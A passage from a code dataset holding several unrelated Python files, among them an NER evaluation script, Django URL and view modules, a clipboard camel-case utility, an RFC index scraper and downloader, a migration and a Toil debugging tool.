{species_type}\")\r\nst.image(load_image(f\"{species_type}.jpg\"))\r\n \r\n\r\n#-------------------------------------------------------------\r\n \r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n","sub_path":"IRIS_APP.py","file_name":"IRIS_APP.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"320653810","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 21 21:13:09 2019\r\n\r\n@author: Αλέξανδρος\r\n\"\"\"\r\nents = []\r\ntexts = []\r\nett = [ \"Protein\", \"DNA\", \"RNA\", \"Cell Type\", \"Cell Line\" ]\r\n#PROTEIN, DNA, RNA, CELL_TYPE, CELL_LINE\r\ntp = [0, 0, 0, 0, 0] #true positives\r\nretrieved = [0, 0, 0, 0, 0]\r\nwith open(\"3. geniatagger tags\\\\osiris.txt\", encoding=\"utf-8\") as fi:\r\n \r\n line = fi.readline()\r\n \r\n while line:\r\n line = line.lower()# to make easier the comparison of strings\r\n line = line.split(\"\\t\")#to get entity type(ent) and entity(text)\r\n \r\n ent = line[1]\r\n #get retrieved for precision\r\n #not elif as there can be multiple types per entity\r\n if \"protein\" in ent:\r\n retrieved[0] += 1\r\n if \"dna\" in ent:\r\n retrieved[1] += 1\r\n if \"rna\" in ent:\r\n retrieved[2] += 1\r\n if \"cell_type\" in ent or \"celltype\" in ent or \"cell type\" in ent:\r\n retrieved[3] += 1\r\n if \"cell_line\" in ent or \"cellline\" in ent or \"cell line\" in ent:\r\n retrieved[4] += 1\r\n \r\n text = line[4]\r\n \r\n ents.append(ent)\r\n texts.append(text)\r\n \r\n line = fi.readline()\r\n \r\nrelevant = [0, 0, 0, 0, 0]\r\nwith open(\"1. annotations\\\\osiris.txt\", encoding=\"utf-8\") as fi:\r\n \r\n line = fi.readline()\r\n \r\n while line:\r\n \r\n line = line.lower()\r\n line = line.split(\"\\t\")\r\n \r\n ent = line[1]\r\n #get the relevants for recall\r\n #not elif as there can be multiple types per entity\r\n if \"protein\" in ent:\r\n relevant[0] += 1\r\n if \"dna\" in ent:\r\n relevant[1] += 1\r\n if \"rna\" in ent:\r\n relevant[2] += 1\r\n if \"cell_type\" in ent or \"celltype\" in ent or \"cell type\" in ent:\r\n relevant[3] += 1\r\n if \"cell_line\" in ent or \"cellline\" in ent or \"cell line\" in ent:\r\n relevant[4] += 1\r\n \r\n text = line[4]\r\n \r\n #check if the current line is found by the NER program\r\n if text in texts:\r\n index = texts.index(text)\r\n tmp = ents[ index ]\r\n \r\n del texts[index] #remove the text\r\n del ents[index]\r\n \r\n #not elif as there can be multiple types per entity\r\n if \"protein\" in ent and \"protein\" in tmp:\r\n tp[0] += 1\r\n if \"dna\" in ent and \"dna\" in tmp:\r\n tp[1] += 1\r\n if \"rna\" in ent and \"rna\" in tmp:\r\n tp[2] += 1\r\n if (\"cell_type\" in ent or \"celltype\" in ent or \"cell type\" in ent) and (\"cell_type\" in tmp or \"celltype\" in tmp or \"cell type\" in tmp):\r\n tp[3] += 1\r\n if (\"cell_line\" in ent or \"cellline\" in ent or \"cell line\" in ent) and (\"cell_line\" in tmp or \"cellline\" in tmp or \"cell line\" in tmp):\r\n tp[4] += 1\r\n \r\n line = fi.readline()\r\n\r\n#for micro and macro average\r\nrelevant_sum = sum(relevant)#sum of all relevant\r\nretrieved_sum = sum(retrieved)#sum of all retrieved\r\ntp_sum = 0 # sum of all tp\r\nprec = 0 #sum of all precisions\r\nrec = 0 #sum of all recalls\r\n#for weighted average\r\nweighted_p = 0 \r\nweighted_r = 0\r\ntotal = len(ett)\r\n#print results\r\nfor i in range(0, len(ett)):\r\n \r\n if retrieved[i] == 0 or relevant[i] == 0 or tp[i] == 0:\r\n precision = 0\r\n recall = 0\r\n f1 = 0\r\n else:\r\n precision = tp[i]/retrieved[i]\r\n recall = tp[i]/relevant[i]\r\n f1 = (2 * precision * recall) / (precision + recall)\r\n \r\n #for micro and macro average\r\n tp_sum += tp[i]\r\n prec += precision\r\n rec += recall\r\n #for weighted average\r\n if retrieved_sum != 0:\r\n weighted_p += ( precision * ( retrieved[i] / retrieved_sum ) )\r\n else:\r\n weighted_p += 0\r\n \r\n if relevant_sum != 0:\r\n weighted_r += ( recall * ( relevant[i] / relevant_sum ) )\r\n else:\r\n weighted_r += 0\r\n \r\n print(\"{}: \".format(ett[i]))\r\n print(\"\\tPrecision: {}\".format(precision))\r\n print(\"\\tRecall: {}\".format(recall))\r\n print(\"\\tF1: {}\".format(f1))\r\n #for micro and macro average\r\n print(\"\\tTrue Positives: {}\".format(tp[i]))\r\n print(\"\\tFalse Positives: {}\".format( abs(tp[i] - retrieved[i]) ))\r\n print(\"\\tFalse Negatives: {}\".format( abs(tp[i] - relevant[i]) )) \r\n\r\n#micro average\r\nif retrieved_sum != 0:\r\n mi_pre = tp_sum/retrieved_sum\r\nelse:\r\n mi_pre = 0\r\n \r\nif relevant_sum != 0:\r\n mi_rec = tp_sum/relevant_sum\r\nelse:\r\n mi_rec = 0\r\n\r\nif (mi_pre + mi_rec) != 0:\r\n mi_f1 = (2 * mi_pre * mi_rec) / (mi_pre + mi_rec)\r\nelse:\r\n mi_f1 = 0\r\nprint(\"Micro Average: \")\r\nprint(\"\\tPrecision: {}\".format(mi_pre))\r\nprint(\"\\tRecall: {}\".format(mi_rec))\r\nprint(\"\\tF1: {}\".format(mi_f1))\r\n \r\n#macro average\r\nma_pre = prec/total\r\nma_rec = rec/total\r\n\r\nif (ma_pre + ma_rec) != 0:\r\n ma_f1 = (2 * ma_pre * ma_rec) / (ma_pre + ma_rec)\r\nelse:\r\n ma_f1 = 0\r\n\r\nprint(\"Macro Average: \")\r\nprint(\"\\tPrecision: {}\".format(ma_pre))\r\nprint(\"\\tRecall: {}\".format(ma_rec))\r\nprint(\"\\tF1: {}\".format(ma_f1))\r\n\r\n#weighted average\r\nwe_pre = weighted_p\r\nwe_rec = weighted_r\r\n\r\nif (we_pre + we_rec) != 0:\r\n we_f1 = (2 * we_pre * we_rec) / (we_pre + we_rec)\r\nelse:\r\n we_f1 = 0\r\n\r\nprint(\"Weighted Average: \")\r\nprint(\"\\tPrecision: {}\".format(we_pre))\r\nprint(\"\\tRecall: {}\".format(we_rec))\r\nprint(\"\\tF1: {}\".format(we_f1))\r\n","sub_path":"code/tools/abner/pr_abner.py","file_name":"pr_abner.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"459272770","text":"from django.urls import path,re_path\r\nfrom django.views.generic import DetailView, ListView, UpdateView\r\nfrom .form import RestaurantForm,DishForm\r\nfrom .models import Restaurant,Dish\r\nfrom .views import RestaurantDetail,RestaurantCreate,DishCreate,DishDetail\r\nfrom . import views\r\nfrom django.utils import timezone\r\n\r\nurlpatterns = [\r\n path('signup/', views.SignUp.as_view(), name='signup'),\r\n\r\n re_path(r'^myrestaurants',ListView.as_view(\r\n \tqueryset=Restaurant.objects.filter(date__lte=timezone.now()).order_by('date')[:10],\r\n context_object_name='latest_restaurant_list',\r\n template_name='restaurant_list.html'),\r\n name='restaurant_list'),\r\n\r\n\r\n re_path(r'^mydishes',ListView.as_view(\r\n \tqueryset=Dish.objects.filter(date__lte=timezone.now()).order_by('date')[:10],\r\n context_object_name='latest_dishes_list',\r\n template_name='dish_list.html'),\r\n name='dish_list'),\r\n\r\n\r\n re_path(r'^restaurants/(?P\\d+)/\\$',\r\n RestaurantDetail.as_view(),\r\n name='restaurant_detail'),\r\n\r\n\r\n re_path(r'^mydishes/(?P\\d+)/\\$',\r\n DishDetail.as_view(),\r\n name='dish_detail'), \r\n\r\n re_path(r'\\^restaurants/create/\\$',\r\n RestaurantCreate.as_view(),\r\n name='restaurant_create'),\r\n\r\n\r\n re_path(r'\\^mydishes/create/\\$',\r\n \tDishCreate.as_view(),\r\n name='dish_create'),\r\n\r\n\r\n re_path(r'^Customerpage/',views.CustomerPage,name='customerpage'),\r\n\r\n\r\n re_path(r'^Customersupport/',views.CustomerSupport,name='customersupport'),\r\n\r\n re_path(r'^deals/',views.Deals,name='deals'),\r\n\r\n re_path(r'^menu/',views.Menu,name='menu'),\r\n\t \r\n\t re_path(r'^chat/', views.Chat, name='chat'),\r\n\r\n\r\n\r\n\r\n]","sub_path":"classproject/project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"233452191","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Required parameters:\n# @raycast.schemaVersion 1\n# @raycast.title Camel Case\n# @raycast.mode inline\n# @raycast.packageName Change Case\n\n# Optional parameters:\n# @raycast.icon ./images/camelcase-light.png\n# @raycast.iconDark ./images/camelcase-dark.png\n\n# Documentation:\n# @raycast.author Robert Cooper\n# @raycast.authorURL https://github.com/robertcoopercode\n# @raycast.description Change to clipboard text to camel case\n\nimport subprocess\nimport re\n\nalways_uppercase = r\"\"\"\\bXML|HTML|CSS|JSON|FYI|AOL|ATM|BBC|CD|FAQ|GAIM|GNU|GTK|HIRD|HIV\n |HURD|IEEE|IOU|IRA|IUPAC|JPEG|LCD|NAACP|NAC|NATO|NCAA|NOAD|OEM|PHP|ROM|SAT|SFMOMA|SQL|USA|VHDL|VHSIC|W3C\n |LOL|WTF\\b\"\"\"\nalways_uppercase_re = re.compile(always_uppercase, re.I | re.X)\n\n\ndef __dict_replace(s, d):\n \"\"\"Replace substrings of a string using a dictionary.\"\"\"\n for key, value in d.items():\n s = s.replace(key, value)\n return s\n\n\nSMALL = \"a|an|and|as|at|but|by|en|for|if|in|of|on|or|the|to|v\\.?|via|vs\\.?\"\nPUNCT = r\"\"\"!\"#$%&'‘()*+,\\-./:;?@[\\\\\\]_`{|}~\"\"\"\n\nSMALL_WORDS = re.compile(r\"^(%s)$\" % SMALL, re.I)\nINLINE_PERIOD = re.compile(r\"[a-z][.][a-z]\", re.I)\nUC_ELSEWHERE = re.compile(r\"[%s]*?[a-zA-Z]+[A-Z]+?\" % PUNCT)\nCAPFIRST = re.compile(r\"^[%s]*?([A-Za-z])\" % PUNCT)\nSMALL_FIRST = re.compile(r\"^([%s]*)(%s)\\b\" % (PUNCT, SMALL), re.I)\nSMALL_LAST = re.compile(r\"\\b(%s)[%s]?$\" % (SMALL, PUNCT), re.I)\nSUBPHRASE = re.compile(r\"([:.;?!][ ])(%s)\" % SMALL)\nAPOS_SECOND = re.compile(r\"^[dol]{1}['‘]{1}[a-z]+$\", re.I)\nALL_CAPS = re.compile(r\"^[A-Z\\s%s]+$\" % PUNCT)\nUC_INITIALS = re.compile(r\"^(?:[A-Z]{1}\\.{1}|[A-Z]{1}\\.{1}[A-Z]{1})+$\")\nMAC_MC = re.compile(r\"^([Mm]a?c)(\\w+)\")\n\n\ndef titlecase(text):\n\n \"\"\"\n Titlecases input text\n\n This filter changes all words to Title Caps, and attempts to be clever\n about *un*capitalizing SMALL words like a/an/the in the input.\n\n The list of \"SMALL words\" which are not capped comes from\n the New York Times Manual of Style, plus 'vs' and 'v'.\n\n \"\"\"\n\n lines = re.split(\"[\\r\\n]+\", text)\n processed = []\n for line in lines:\n all_caps = ALL_CAPS.match(line)\n words = re.split(\"[\\t ]\", line)\n tc_line = []\n for word in words:\n if all_caps:\n if UC_INITIALS.match(word):\n tc_line.append(word)\n continue\n else:\n word = word.lower()\n\n if APOS_SECOND.match(word):\n word = word.replace(word[0], word[0].upper())\n word = word.replace(word[2], word[2].upper())\n tc_line.append(word)\n continue\n if INLINE_PERIOD.search(word) or UC_ELSEWHERE.match(word):\n tc_line.append(word)\n continue\n if SMALL_WORDS.match(word):\n tc_line.append(word.lower())\n continue\n\n match = MAC_MC.match(word)\n if match:\n tc_line.append(\n \"%s%s\" % (match.group(1).capitalize(), match.group(2).capitalize())\n )\n continue\n\n hyphenated = []\n for item in word.split(\"-\"):\n hyphenated.append(CAPFIRST.sub(lambda m: m.group(0).upper(), item))\n tc_line.append(\"-\".join(hyphenated))\n\n result = \" \".join(tc_line)\n\n result = SMALL_FIRST.sub(\n lambda m: \"%s%s\" % (m.group(1), m.group(2).capitalize()), result\n )\n\n result = SMALL_LAST.sub(lambda m: m.group(0).capitalize(), result)\n\n result = SUBPHRASE.sub(\n lambda m: \"%s%s\" % (m.group(1), m.group(2).capitalize()), result\n )\n\n processed.append(result)\n\n return \"\\n\".join(processed)\n\n\ndef titlecase_plus(text):\n \"\"\"The titlecase module assumes words in all UPPERCASE should be ignored.\n This works for words like HTML, FYI, ID, etc., but not generally. Just work\n around for now by going to .lower first. Then, replace any well known\n \"always\" uppercase\"\"\"\n text = titlecase(text.lower())\n\n def upcase(m):\n return m.group().upper()\n\n return always_uppercase_re.sub(upcase, text)\n\ndef getClipboardData():\n p = subprocess.Popen([\"pbpaste\"], stdout=subprocess.PIPE)\n data = p.stdout.read()\n return tryDecode(data)\n\ndef setClipboardData(data):\n p = subprocess.Popen([\"pbcopy\"], stdin=subprocess.PIPE)\n p.stdin.write(tryEncode(data))\n p.stdin.close()\n\ndef tryDecode(s):\n try:\n return s.decode('utf-8')\n except:\n return s\n\ndef tryEncode(s):\n try:\n return s.encode('utf-8')\n except:\n return s\n\nclipboard = str(getClipboardData())\nresult = titlecase_plus(clipboard).replace(\" \", \"\")\nresult = result[0].lower() + result[1:]\nsetClipboardData(result)\nprint(result)\n","sub_path":"commands/conversions/change-case/camelcase.py","file_name":"camelcase.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"13040538","text":"import os\nimport re\nimport argparse\n\nimport wget\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef parse_arguments():\n \"\"\"\n url, errors_filepath, outdir\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--index_url\",\n type=str,\n default='https://tools.ietf.org/rfc/index',\n help=\"URL of the online RFC index.\",\n )\n parser.add_argument(\"--rfc_base_url\",\n type=str,\n default='https://tools.ietf.org/rfc/', \n help=\"Base URL for downloading a RFC in text form.\",\n )\n parser.add_argument(\"--outdir\",\n type=str,\n required=True,\n help=\"Output directory.\",\n )\n arguments, _ = parser.parse_known_args()\n return arguments\n\n\n\ndef concat_rfc_lines(lines):\n \"\"\"\n Given a list of lines where a same RFC is described on multiple lines, concat\n the lines describing the same RFC.\n \"\"\"\n rfc_lines = []\n current_rfc = ''\n for line in lines:\n if line.startswith('RFC'):\n rfc_lines.append(current_rfc) # End of previous RFC, append it to list.\n current_rfc = line # Get beginning of new rfc.\n else:\n current_rfc += line\n return rfc_lines\n\n\ndef remove_multiple_spaces(text):\n \"\"\"\n Given a string, replace all multiple spaces in it by a single space.\n \"\"\"\n text = re.sub('\\s{2,}', ' ', text)\n text = text.lstrip().rstrip() # Remove whitespaces in beginning or end of string.\n return text\n \n\ndef get_rfc_lines(page):\n \"\"\"\n Given the result of an url request, get the text of interest.\n \"\"\"\n # Load the page with BeautifulSoup.\n soup = BeautifulSoup(page.content, 'html.parser')\n \n # Get the text of interest (the index is in
    ...
    ).\n body = soup('pre')[0]\n \n # Get plain text.\n content = body.get_text() \n \n # Remove all text before the line beginning by 'RFC1' (beginning of the index).\n content = content.split('RFC1 ')[1]\n content = 'RFC1 ' + content\n \n # Split raw text to lines.\n lines = content.splitlines()\n lines = [line for line in lines if line != ''] # remove empty lines.\n \n # Concat lines describing the same RFC.\n rfc_lines = concat_rfc_lines(lines)\n rfc_lines = rfc_lines[1:]\n \n # Remove multiple spaces in lines.\n rfc_lines = [remove_multiple_spaces(line) for line in rfc_lines]\n \n # Remove all 'Non Issued' RFC lines.\n rfc_lines = [line for line in rfc_lines if 'Not Issued' not in line]\n \n return rfc_lines\n\n\ndef create_dataframe(rfc_lines):\n \"\"\"\n Given the lines describing each RFC, create a dataframe.\n \"\"\"\n # Init lists.\n names = []\n titles = []\n authors = []\n dates = []\n formats = []\n obsolotes = []\n obsoloted = []\n updates = []\n updated = []\n also = []\n status = []\n dois = []\n \n # Process each line.\n for i, line in enumerate(tqdm(rfc_lines)):\n \n # Get all attributes within brackets.\n brackets = re.findall(r\"\\((.*?)\\)\", line)\n\n # Get individual attributes.\n form = None\n obs = None\n obs_by = None\n up = None\n up_by = None\n al = None\n stat = None\n doi = None\n for att in brackets:\n if att.startswith('Format: '):\n form = att.split('Format: ')[1]\n elif att.startswith('Obsolotes '):\n obs = att.split('Obsolotes ')[1]\n elif att.startswith('Obsoleted by '):\n obs_by = att.split('Obsoleted by ')[1]\n elif att.startswith('Updates '):\n up = att.split('Updates ')[1]\n elif att.startswith('Updated by '):\n up_by = att.split('Updated by ')[1]\n elif att.startswith('Also '):\n al = att.split('Also ')[1]\n elif att.startswith('Status: '):\n stat = att.split('Status: ')[1]\n elif att.startswith('DOI: '):\n doi = att.split('DOI: ')[1]\n line = line.split('(Format')[0].rstrip() # Remove bracket attributes from the line.\n\n # Get the date of publication.\n split_line = line.split(\".\")\n split_line = [l for l in split_line if l != '']\n date = split_line[-1].lstrip()\n line = line.replace(date + '.', '') # Remove date from line.\n\n # Get name of RFC.\n name = line.split()[0]\n line = line.replace(name, '') # Remove name from line.\n\n # Get title of RFC.\n split_line = line.split('.')\n title = split_line.pop(0)\n while not split_line[0].isspace() and not (len(split_line[0]) == 2 and split_line[0][0].isspace() and split_line[0][1].isupper()):\n title += ('.' + split_line.pop(0)) # This line deals with a title that contains dots.\n line = line.replace(title + '.', '') # Remove title from line.\n\n # Get authors.\n aut = line.lstrip().rstrip()[:-1]\n\n # Append all info to corresponding list.\n names.append(name)\n titles.append(title)\n authors.append(aut)\n dates.append(date)\n formats.append(form)\n obsolotes.append(obs)\n obsoloted.append(obs_by)\n updates.append(up)\n updated.append(up_by)\n also.append(al)\n status.append(stat)\n dois.append(doi)\n\n # Create dataframe.\n d = {'Name':names,\n 'Title':titles,\n 'Authors':authors,\n 'Date':dates,\n 'Formats':formats,\n 'Obsolotes':obsolotes,\n 'Obsoloted_by':obsoloted,\n 'Updates':updates,\n 'Updated_by':updated,\n 'Also_FYI':also,\n 'Status':status,\n 'DOI':dois}\n df = pd.DataFrame(d)\n return df\n\n\ndef download_all(rfc_base_url, rfc_ids, outdir):\n \"\"\"\n \"\"\"\n os.makedirs(outdir, exist_ok=True) # Create output directory if not exists.\n\n errors = [] # Keep track of rfc badly downloaded.\n for rfc in tqdm(rfc_ids):\n url = rfc_base_url + rfc + '.txt' # Create the download url.\n try:\n wget.download(url, outdir)\n except Exception as e:\n errors.append(rfc)\n print(\"{}: HTTP Error 404 - Not Found.\".format(rfc))\n \n return errors\n\n\ndef update_dataframe(df, errors):\n \"\"\"\n Given the download errors, remove the corresponding rfc from the database.\n \"\"\"\n df['Name'] = df['Name'].str.lower()\n df = df[~df['Name'].isin(errors)]\n return df\n \n\ndef main(args):\n \"\"\"\n \"\"\"\n print(\"\\nDownload the index page at {}...\".format(args.index_url))\n page = requests.get(args.index_url)\n \n print(\"\\nExtract all RFC lines...\")\n rfc_lines = get_rfc_lines(page)\n \n print(\"\\nProcess index lines...\")\n df = create_dataframe(rfc_lines)\n \n print(\"\\nDownload all RFC files to {}...\".format(os.path.join(args.outdir, 'raw')))\n rfc_ids = df['Name'].str.lower().tolist()\n errors = download_all(args.rfc_base_url, rfc_ids, os.path.join(args.outdir, 'raw'))\n print(\"Download errors: {}\".format(str(errors)))\n \n # Remove from df the rfc that were not downloaded (as it is this database that is used for cleaning files).\n df = update_dataframe(df, errors)\n os.makedirs(args.outdir, exist_ok=True)\n df.to_csv(os.path.join(args.outdir, 'info.csv'), sep=',', encoding='utf-8', float_format='%.10f', decimal='.')\n print(\"\\nDONE.\")\n\n\nif __name__==\"__main__\":\n args = parse_arguments()\n main(args)\n","sub_path":"index_creation/tools/download_all.py","file_name":"download_all.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"414629061","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('icekit_events', '0011_event_show_in_calendar'),\n ]\n\n operations = [\n migrations.AlterModelTable(\n name='event',\n table=None,\n ),\n migrations.AlterModelTable(\n name='recurrencerule',\n table=None,\n ),\n migrations.RunSQL(\n \"UPDATE django_content_type SET app_label='icekit_events' WHERE app_label='eventkit'\",\n # No-op: I haven't yet found a way to make this reversible in the\n # way you would expect without unique constraint DB errors, whereas\n # it works (according to unit tests at least) with a no-op.\n \"UPDATE django_content_type SET app_label=app_label WHERE app_label='NONE!'\",\n ),\n ]\n","sub_path":"icekit_events/migrations/0012_auto_20160706_1606.py","file_name":"0012_auto_20160706_1606.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"420801886","text":"import os\nos.environ['DJANGO_SETTINGS_MODULE']='weathersite.settings'\n\nimport signal\nimport sys\nimport argparse\nimport logging\nfrom sensorlib.DataGatherer import DataGatherer\n\ndef signal_handler(signal, frame):\n\tlogger.info(\"User interrupted. Cleaning up and exiting.\")\n\tmyDataGatherer.cleanup()\n\tsys.exit(0)\n\ndef positive_int(value):\n\tivalue = int(value)\n\tif ivalue < 0:\n\t\traise argparse.ArgumentTypeError(\"invalid positive_int value: '%s'\" % value)\n\treturn ivalue\n\t\nparser = argparse.ArgumentParser(description='Process some integers', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('-s', '--sample-rate', default=900, type=positive_int, help=\"Rate at which to sample data from the sensors in seconds. Choose between 120 seconds (2 min) and 86400 seconds (24 hours)\")\nparser.add_argument('-n', '--number', default=0, type=positive_int, help=\"Number of samples to take. 0 means keep sampling indefinitely\")\nparser.add_argument('-q', '--quiet', action='store_true', help=\"Log to the log file instead of the console\")\n\nargs = parser.parse_args()\nif (args.sample_rate < 120):\n\targs.sample_rate = 120\nif (args.sample_rate > 86400):\n\targs.sample_rate = 86400\n\nlogger = logging.getLogger('weathersite.console')\nif (args.quiet):\n\tlogger = logging.getLogger('weathersite.weatherapp')\n\nsignal.signal(signal.SIGINT, signal_handler)\nmyDataGatherer = DataGatherer(args.sample_rate, args.number, logger)\nmyDataGatherer.probe()","sub_path":"sensor_data_gatherer.py","file_name":"sensor_data_gatherer.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"77070876","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.views.generic import UpdateView\nfrom django.contrib.auth.decorators import login_required\nfrom datetime import date\n\nfrom .models import Asset\nfrom history.models import History\nfrom custodians.models import Custodian\nfrom categories.models import SubCategory, Category\nfrom allocations.models import Allocation\n\n# from .forms import AssetForm, AssignForm\nfrom pages.decorators import allowed_users\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer', 'logassistant'])\ndef list_view(request):\n\n queryset = reversed(Asset.objects.all())\n context = {\n \"object_list\": queryset\n }\n return render(request, \"list_view.html\", context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer', 'logassistant'])\ndef detail_view(request,asset_id):\n #Show method if exists:\n obj = get_object_or_404(Asset, id=asset_id)\n queryset = reversed(Allocation.objects.filter(assets=asset_id))\n\n context = {\n \"object\": obj,\n \"object_list\": queryset\n }\n return render(request, \"asset_details.html\", context)\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer'])\ndef create_view(request):\n if request.method == \"GET\":\n queryset = SubCategory.objects.all()\n context ={\n \"object\": queryset\n }\n return render(request, \"asset_create.html\", context)\n if request.method == \"POST\":\n #Asset info\n c_tag = request.POST.get('tag_number')\n c_brand = request.POST.get('brand')\n c_model = request.POST.get('model')\n c_serial = request.POST.get('serial')\n c_description = request.POST.get('description')\n data = request.POST.get('sub_cat')\n c_sub_cat = SubCategory.objects.get(id=data)\n #User info\n c_location = request.POST.get('location')\n c_physical_location = request.POST.get('physical_location')\n c_condition = request.POST.get('condition')\n c_accessories = request.POST.get('accessories')\n #Purchase Info\n c_purchaseReferece = request.POST.get('purchaseReference')\n c_purchaseDate = request.POST.get('purchaseDate')\n c_price = request.POST.get('price')\n c_donor = request.POST.get('donor')\n c_budgetCode = request.POST.get('budgetCode')\n c_supplierName = request.POST.get('supplierName')\n c_comments = request.POST.get('comments')\n\n # Create Code\n new = Asset.objects.create(tag_number=c_tag,\n brand = c_brand,\n model = c_model,\n serial = c_serial,\n sub_category = c_sub_cat,\n description = c_description,\n price = c_price,\n location = c_location,\n physical_location = c_physical_location,\n condition = c_condition,\n accessories = c_accessories,\n donor = c_donor,\n budgetCode = c_budgetCode,\n purchaseReference = c_purchaseReferece,\n purchaseDate = c_purchaseDate,\n supplierName = c_supplierName,\n comments = c_comments)\n return redirect(\"/assets/list_view/\", {})\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer'])\ndef update_view(request, asset_id):\n\n if request.method == 'POST':\n obj = get_object_or_404(Asset, id=asset_id)\n # Asset info\n obj.tag = request.POST.get('tag_number')\n obj.brand = request.POST.get('brand')\n obj.model = request.POST.get('model')\n obj.serial = request.POST.get('serial')\n obj.description = request.POST.get('description')\n data = request.POST.get('sub_cat')\n obj.sub_category = SubCategory.objects.get(id=data)\n # User info\n obj.location = request.POST.get('location')\n obj.physical_location = request.POST.get('physical_location')\n obj.condition = request.POST.get('condition')\n obj.accessories = request.POST.get('accessories')\n # Purchase Info\n obj.purchaseReferece = request.POST.get('purchaseReference')\n obj.purchaseDate = request.POST.get('purchaseDate')\n obj.price = request.POST.get('price')\n obj.donor = request.POST.get('donor')\n obj.budgetCode = request.POST.get('budgetCode')\n obj.supplierName = request.POST.get('supplierName')\n obj.comments = request.POST.get('comments')\n\n data = request.POST.get('custodian')\n # gets \"custodian_id\" from post data\n obj.custodian = Custodian.objects.get(id=data)\n # gets \"custodian\"\n\n obj.save()\n\n\n return redirect('assets:asset-detail', asset_id=asset_id)\n\n asset = get_object_or_404(Asset, id=asset_id)\n obj2 = Custodian.objects.all()\n obj3 = SubCategory.objects.all()\n context = {\n \"object\": asset,\n \"custodian\": obj2,\n \"subcategory\": obj3\n }\n return render(request, \"asset_update.html\", context)\n\n\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco', 'logmanager', 'logofficer', 'logassistant'])\ndef assign_view(request, asset_id):\n\n # gets the values of the URL\n if request.method == \"GET\":\n obj = get_object_or_404(Asset, id=asset_id)\n obj2 = Custodian.objects.all()\n context = {\n \"object\": obj,\n \"custodian\": obj2\n }\n return render(request, \"asset_assign.html\", context)\n\n # for posting the values of the URL\n if request.method == \"POST\":\n a_id = get_object_or_404(Asset, id=asset_id)\n a_id.location = request.POST.get('location')\n a_id.physical_location = request.POST.get('physical_location')\n a_id.comments = request.POST.get('comments')\n #gets \"asset\"\n data = request.POST.get('custodian')\n #gets \"custodian_id\" from post data\n c_id = Custodian.objects.get(id=data)\n #gets \"custodian\"\n\n a_id.custodian = c_id #assigns id field of custodian to the asset's field\n a_id.save()\n\n ret = History.objects.create(asset_id=a_id, custodian_id=c_id) #creates history of the assignment\n\n return redirect('assets:asset-detail', asset_id=asset_id)\n\n\n\n\n@login_required(login_url='login')\n@allowed_users(allowed_roles=['logco'])\ndef delete_view(request,product_id):\n #Show method if exists:\n obj = Asset.objects.get(id=product_id)\n #delete method:\n obj.delete()\n context = {\n }\n return render(request, \"delete_view.html\", context)\n\n\n\n# Create your views here.\n","sub_path":"assets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"609609688","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/toil/utils/toilDebugJob.py\n# Compiled at: 2020-05-07 00:32:15\n# Size of source mod 2**32: 2595 bytes\n\"\"\"Debug tool for running a toil job locally.\n\"\"\"\nfrom __future__ import absolute_import\nimport logging\nfrom toil.lib.bioio import getBasicOptionParser\nfrom toil.lib.bioio import parseBasicOptions\nfrom toil.common import jobStoreLocatorHelp, Config, Toil\nfrom toil.version import version\nfrom toil.worker import workerScript\nfrom toil.utils.toilDebugFile import printContentsOfJobStore\nlogger = logging.getLogger(__name__)\n\ndef print_successor_jobs():\n pass\n\n\ndef main():\n parser = getBasicOptionParser()\n parser.add_argument('jobStore', type=str, help=('The location of the job store used by the workflow.' + jobStoreLocatorHelp))\n parser.add_argument('jobID', nargs=1, help='The job store id of a job within the provided jobstore to run by itself.')\n parser.add_argument('--printJobInfo', nargs=1, help='Return information about this job to the user including preceding jobs, inputs, outputs, and runtime from the last known run.')\n parser.add_argument('--version', action='version', version=version)\n options = parseBasicOptions(parser)\n config = Config()\n config.setOptions(options)\n jobStore = Toil.resumeJobStore(config.jobStore)\n if options.printJobInfo:\n printContentsOfJobStore(jobStorePath=(options.jobStore), nameOfJob=(options.printJobInfo))\n jobID = options.jobID[0]\n logger.debug('Going to run the following job locally: %s', jobID)\n workerScript(jobStore, config, jobID, jobID, redirectOutputToLogFile=False)\n 